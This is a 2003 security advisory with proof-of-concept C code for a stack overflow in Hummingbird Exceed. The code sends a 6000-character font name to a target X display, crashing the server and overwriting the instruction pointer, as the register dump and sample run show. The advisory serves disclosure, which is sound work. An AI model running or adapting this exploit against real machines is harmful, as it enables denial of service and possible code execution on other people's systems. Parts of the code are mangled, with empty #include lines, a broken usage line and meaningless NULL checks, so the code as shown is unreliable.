2
*****************************************************************************
$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code
***************************************************************************
1: Bug Researcher: c0ntex@hushmail.com
2: Bug Released: August 2003
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote / Local
****************************************************************************
****************************************************************************
HQOTD: "How secure do you want it"
http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf
I'll tell you: Much more please sirs.
**************************************
Exceed has some bugs caused by the way it handles fonts in a local and remote context.
By requesting the use of a font from an Exceed database, providing the font name is
either longer than the defined buffer or the font has been prepared as hostile code,
a stack based overflow will occur. This will allow the execution of external commands
on the vulnerable system.
Obviously it's possible to cause a denial of service (DOS) attack on a machine running
Exceed too.
By sending an X Term window or any other X application to Exceed, loading a large font
name or creating a large window title, we can corrupt the stack and cause Exceed to
crash.
Windows Stack Trace:
--------------------
EAX = C0000000
EBX = 00000000
ECX = 40000000
EDX = 00000501
ESI = 41414141
EDI = 0012E138
EIP = 41414141
ESP = 0012E0C8
EBP = 0012E0F0
[-] We can crash a local Exceed server * 2
[-] We can crash a remote Exceed server * many
[-] We can crash Exceed client * many
[-] We can write over EIP address * many
See the POC code below for more information.
Example Run:
------------
[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
[c0ntex@darkside exceed]$ ./exceed exploited:0.0
[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
[-] We are using DISPLAY variable: exploited:0.0
[-] Hang on to your feathers, sending some buffer
..
XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
after 11 requests (9 known processed) with 0 events remaining.
Remote Font Server:
-------------------
If you find that you use remote font servers with Exceed, a way to check that the server
is not trying to exploit your PC could be:
$ xlsfonts -display exceed_server:0.0
--------0------
--arial-bold-r---0-0-120-120-p-0-iso8859-1
--arial-medium-r---0-0-120-120-p-0-iso8859-1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here is evil font
...
******************************************************************************************************************
$ Hummingbird informed 3 weeks ago, still no reply.
$ Work around: Uninstall Exceed until a patch has been released.
******************************************************************************************************************
*/
#include
#include
#include
#include
#include
#define BIGBIRD 6001
#define DIRTY_VAL 69
#define MAX_BORDER_LEN 3
#define WIN_TIMER 5
#define WIN_TITLE "simple PoC window - lets shoot birds"
typedef char Birds;
int main(int argc, char *argv[])
{
Birds nests[BIGBIRD];
Birds egg[2] = { 'A', '\0' };
Birds *feathersN;
Birds *HABITAT = "DISPLAY";
unsigned short eggs, chicks;
unsigned short winW, winH, feathersW, feathersH;
unsigned long locX, locY;
unsigned long winBDR;
Display* feathers;
Window wingspan;
XFontStruct* birdcull;
fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");
if(argc < 2) {
fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
fprintf(stderr, "[-] Usage: %sreturn EXIT_FAILURE;
}
if(setenv(HABITAT, argv[1], 1) <0) { /*;p*/
perror("setenv"); return EXIT_FAILURE;
}
fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);
for(eggs = 0; eggs < BIGBIRD -1; eggs++)
if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {
perror("strncat"); return EXIT_FAILURE;
}
if((feathers = XOpenDisplay(feathersN)) == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}
chicks = DefaultScreen(feathers);
winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);
winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);
locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;
wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
locX, locY, winW, winH, winBDR,
BlackPixel(feathers, chicks),
WhitePixel(feathers, chicks));
if(XCreateSimpleWindow == NULL) {
perror("XCreateSimpleWindow"); return EXIT_FAILURE;
}
XStoreName(feathers, wingspan, WIN_TITLE);
if(XStoreName == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}
XMapWindow(feathers, wingspan);
if(XMapWindow == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}
fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");
if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
perror("XLoadQueryFont"); return EXIT_FAILURE;
}
XCloseDisplay(feathers);
return EXIT_SUCCESS;
}
4/04/10 - 
